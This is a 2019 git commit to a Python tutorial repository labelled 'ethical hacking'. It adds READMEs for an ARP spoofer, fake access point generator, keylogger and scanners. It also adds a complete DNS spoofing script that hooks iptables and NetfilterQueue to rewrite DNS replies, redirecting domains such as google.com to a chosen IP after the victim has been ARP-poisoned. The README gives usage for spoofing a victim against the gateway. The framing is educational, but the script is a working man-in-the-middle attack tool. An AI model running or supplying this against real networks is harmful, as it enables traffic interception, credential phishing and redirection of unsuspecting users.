added READMEs and dns spoof

x4nth055 · x4nth055 · commit 18b6ac7e13b6 · 2019-08-10T15:59:38.000+02:00
diff --git a/README.md b/README.md
@@ -1,2 +1,18 @@
-# pythoncode-tutorials
-PythonCode Tutorials
+# Python Code Tutorials
+This is a repository of all the tutorials of [The Python Code](https://www.thepythoncode.com) website.
+## List of Content
+- ### [Ethical Hacking](https://www.thepythoncode.com/topic/ethical-hacking)
+    -  ### [Scapy](https://www.thepythoncode.com/topic/scapy)
+        - [Building an ARP Spoofer](https://www.thepythoncode.com/article/building-arp-spoofer-using-scapy). ([code](scapy/arp-spoofer))
+        - [Detecting ARP Spoof attacks](https://www.thepythoncode.com/article/detecting-arp-spoof-attacks-using-scapy). ([code](scapy/arp-spoof-detector))
+        - DHCP Listener script. ([code](scapy/dhcp_listener))
+        - [Fake Access Point Generator](https://www.thepythoncode.com/article/create-fake-access-points-scapy). ([code](scapy/fake-access-point))
+        - [Simple Network Scanner](https://www.thepythoncode.com/article/building-network-scanner-using-scapy). ([code](scapy/network-scanner))
+        - [Writing a DNS Spoofer](https://www.thepythoncode.com/article/make-dns-spoof-python). ([code](scapy/dns-spoof))
+    - [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
+    - [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
+
+- ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
+    - [Building a Speech Emotion Recognizer using Scikit-learn](https://www.thepythoncode.com/article/building-a-speech-emotion-recognizer-using-sklearn). ([code](machine-learning/speech-emotion-recognition))
+    - [Top 8 Python Libraries For Data Scientists and Machine Learning Engineers](https://www.thepythoncode.com/article/top-python-libraries-for-data-scientists).
+
diff --git a/ethical-hacking/keylogger/README.md b/ethical-hacking/keylogger/README.md
@@ -0,0 +1,4 @@
+# [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python)
+To run this:
+- `pip3 install -r requirements.txt`
+- Fresh Gmail Account, check this [tutorial](https://www.thepythoncode.com/article/write-a-keylogger-python) to set it up.
diff --git a/ethical-hacking/keylogger/requirements.txt b/ethical-hacking/keylogger/requirements.txt
@@ -0,0 +1 @@
+keyboard
diff --git a/ethical-hacking/port_scanner/README.md b/ethical-hacking/port_scanner/README.md
@@ -0,0 +1,28 @@
+# [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python)
+To run simple port scanner:   
+```
+python simple_port_scanner.py
+```
+To run fast port scanner:
+-
+```
+python fast_port_scanner --help
+```
+**Output:**
+```
+usage: fast_port_scanner.py [-h] [--ports PORT_RANGE] host
+
+Simple port scanner
+
+positional arguments:
+host                  Host to scan.
+
+optional arguments:
+-h, --help            show this help message and exit
+--ports PORT_RANGE, -p PORT_RANGE
+                        Port range to scan, default is 1-65535 (all ports)
+```
+For example, if you want to scan the ports from 1 to 1024 of your router (**192.168.1.1**):
+```
+python3 fast_port_scanner.py 192.168.1.1 --ports 1-1024
+```
diff --git a/scapy/arp-spoof-detector/README.md b/scapy/arp-spoof-detector/README.md
@@ -0,0 +1,7 @@
+# [Detecting ARP Spoof attacks](https://www.thepythoncode.com/article/detecting-arp-spoof-attacks-using-scapy)
+to run this:
+- `pip3 install -r requirements.txt`
+- 
+    ```
+    python3 detect_arpspoof.py wlan0
+    ```
diff --git a/scapy/arp-spoof-detector/requirements.txt b/scapy/arp-spoof-detector/requirements.txt
@@ -0,0 +1 @@
+scapy
diff --git a/scapy/arp-spoofer/README.md b/scapy/arp-spoofer/README.md
@@ -0,0 +1,26 @@
+# [Building an ARP Spoofer](https://www.thepythoncode.com/article/building-arp-spoofer-using-scapy)
+to run this:
+- `pip3 install -r requirements.txt`
+- 
+    ```
+    python3 arp_spoof.py --help
+    ```
+    **Output**:
+    ```
+    usage: arp_spoof.py [-h] [-v] target host
+
+    ARP spoof script
+
+    positional arguments:
+    target         Victim IP Address to ARP poison
+    host           Host IP Address, the host you wish to intercept packets for
+                    (usually the gateway)
+
+    optional arguments:
+    -h, --help     show this help message and exit
+    -v, --verbose  verbosity, default is True (simple message each second)
+    ```
+    For instance, if you want to spoof **192.168.1.2** and the gateway is **192.168.1.1**:
+    ```
+    python3 arp_spoof 192.168.1.2 192.168.1.1 --verbose
+    ```
diff --git a/scapy/arp-spoofer/__pycache__/services.cpython-36.pyc b/scapy/arp-spoofer/__pycache__/services.cpython-36.pyc
diff --git a/scapy/arp-spoofer/requirements.txt b/scapy/arp-spoofer/requirements.txt
@@ -0,0 +1 @@
+scapy
diff --git a/scapy/dhcp_listener/README.md b/scapy/dhcp_listener/README.md
@@ -0,0 +1,7 @@
+# Listening for new Connected Devices in the Network using DHCP
+to run this:
+- `pip3 install -r requirements.txt`
+-   
+    ```
+    python3 dhcp_listener.py
+    ```
diff --git a/scapy/dhcp_listener/dhcp_listener.py b/scapy/dhcp_listener/dhcp_listener.py
@@ -1,35 +1,19 @@
 from scapy.all import *
-from scapy.layers.dhcp import DHCP
 import time
-#
-#
-#
-#
-#
-#
-#
-#
-#
-#
-#
-#
-#
-#
-#
 
 hosts = []
 Ether = 1
 
 
 def listen_dhcp():
-    global k
     # Make sure it is DHCP with the filter options
     k = sniff(prn=print_packet, filter='udp and (port 67 or port 68)')
 
 def print_packet(packet):
     target_mac, requested_ip, hostname, vendor_id = [None] * 4
     if packet.haslayer(Ether):
         target_mac = packet.getlayer(Ether).src
+    # get the DHCP options
     dhcp_options = packet[DHCP].options
     for item in dhcp_options:
         try:
diff --git a/scapy/dhcp_listener/requirements.txt b/scapy/dhcp_listener/requirements.txt
@@ -0,0 +1 @@
+scapy
diff --git a/scapy/dns-spoof/README.md b/scapy/dns-spoof/README.md
@@ -0,0 +1,9 @@
+# [Writing a DNS Spoofer](https://www.thepythoncode.com/article/make-dns-spoof-python)
+To successfully run it, you need:
+- Linux machine ( or VM )
+- `pip3 install -r requirements.txt`
+- Run [ARP Spoof](../arp-spoofer/arp_spoof.py) script against the target.
+- Run this script:
+    ```
+    python3 dns_spoof.py
+    ```
diff --git a/scapy/dns-spoof/dns_spoof.py b/scapy/dns-spoof/dns_spoof.py
@@ -0,0 +1,82 @@
+from scapy.all import *
+from netfilterqueue import NetfilterQueue
+import os
+
+
+# DNS mapping records, feel free to add/modify this dictionary
+# for example, google.com will be redirected to 192.168.1.100
+dns_hosts = {
+    b"www.google.com.": "192.168.1.100",
+    b"google.com.": "192.168.1.100",
+    b"facebook.com.": "172.217.19.142"
+}
+
+
+def process_packet(packet):
+    """
+    Whenever a new packet is redirected to the netfilter queue,
+    this callback is called.
+    """
+    # convert netfilter queue packet to scapy packet
+    scapy_packet = IP(packet.get_payload())
+    if scapy_packet.haslayer(DNSRR):
+        # if the packet is a DNS Resource Record (DNS reply)
+        # modify the packet
+        print("[Before]:", scapy_packet.summary())
+        try:
+            scapy_packet = modify_packet(scapy_packet)
+        except IndexError:
+            # not UDP packet, this can be IPerror/UDPerror packets
+            pass
+        print("[After ]:", scapy_packet.summary())
+        # set back as netfilter queue packet
+        packet.set_payload(bytes(scapy_packet))
+    # accept the packet
+    packet.accept()
+
+
+def modify_packet(packet):
+    """
+    Modifies the DNS Resource Record `packet` ( the answer part)
+    to map our globally defined `dns_hosts` dictionary.
+    For instance, whenver we see a google.com answer, this function replaces 
+    the real IP address (172.217.19.142) with fake IP address (192.168.1.100)
+    """
+    # get the DNS question name, the domain name
+    qname = packet[DNSQR].qname
+    if qname not in dns_hosts:
+        # if the website isn't in our record
+        # we don't wanna modify that
+        print("no modification:", qname)
+        return packet
+    # craft new answer, overriding the original
+    # setting the rdata for the IP we want to redirect (spoofed)
+    # for instance, google.com will be mapped to "192.168.1.100"
+    packet[DNS].an = DNSRR(rrname=qname, rdata=dns_hosts[qname])
+    # set the answer count to 1
+    packet[DNS].ancount = 1
+    # delete checksums and length of packet, because we have modified the packet
+    # new calculations are required ( scapy will do automatically )
+    del packet[IP].len
+    del packet[IP].chksum
+    del packet[UDP].len
+    del packet[UDP].chksum
+    # return the modified packet
+    return packet
+
+
+if __name__ == "__main__":
+    QUEUE_NUM = 0
+    # insert the iptables FORWARD rule
+    os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
+    # instantiate the netfilter queue
+    queue = NetfilterQueue()
+    try:
+        # bind the queue number to our callback `process_packet`
+        # and start it
+        queue.bind(QUEUE_NUM, process_packet)
+        queue.run()
+    except KeyboardInterrupt:
+        # if want to exit, make sure we
+        # remove that rule we just inserted, going back to normal.
+        os.system("iptables --flush")
diff --git a/scapy/dns-spoof/requirements.txt b/scapy/dns-spoof/requirements.txt
@@ -0,0 +1,2 @@
+netfilterqueue
+scapy
diff --git a/scapy/fake-access-point/README.md b/scapy/fake-access-point/README.md
@@ -0,0 +1,29 @@
+# [Fake Access Point Generator](https://www.thepythoncode.com/article/create-fake-access-points-scapy)
+to run this:
+- Linux Machine.
+- USB WLAN Stick.
+- aircrack-ng.
+- Turn the network interface to Monitor mode using the command:
+    ```
+    airmon-ng start wlan0
+    ```
+- `pip3 install -r requirements.txt`.
+- 
+    ```
+    python3 fake_access_point.py --help
+    ```
+    **Output**:
+    ```
+    usage: fake_access_point.py [-h] [-n N_AP] interface
+
+    Fake Access Point Generator
+
+    positional arguments:
+    interface             The interface to send beacon frames with, must be in
+                            monitor mode
+
+    optional arguments:
+    -h, --help            show this help message and exit
+    -n N_AP, --access-points N_AP
+                            Number of access points to be generated
+    ```
diff --git a/scapy/network-scanner/README.md b/scapy/network-scanner/README.md
@@ -0,0 +1,7 @@
+# [Simple Network Scanner](https://www.thepythoncode.com/article/building-network-scanner-using-scapy)
+to run this:
+- `pip3 install -r requirements.txt`
+- 
+    ```
+    python3 network_scanner.py
+    ```
diff --git a/scapy/network-scanner/requirements.txt b/scapy/network-scanner/requirements.txt
@@ -0,0 +1 @@
+scapy
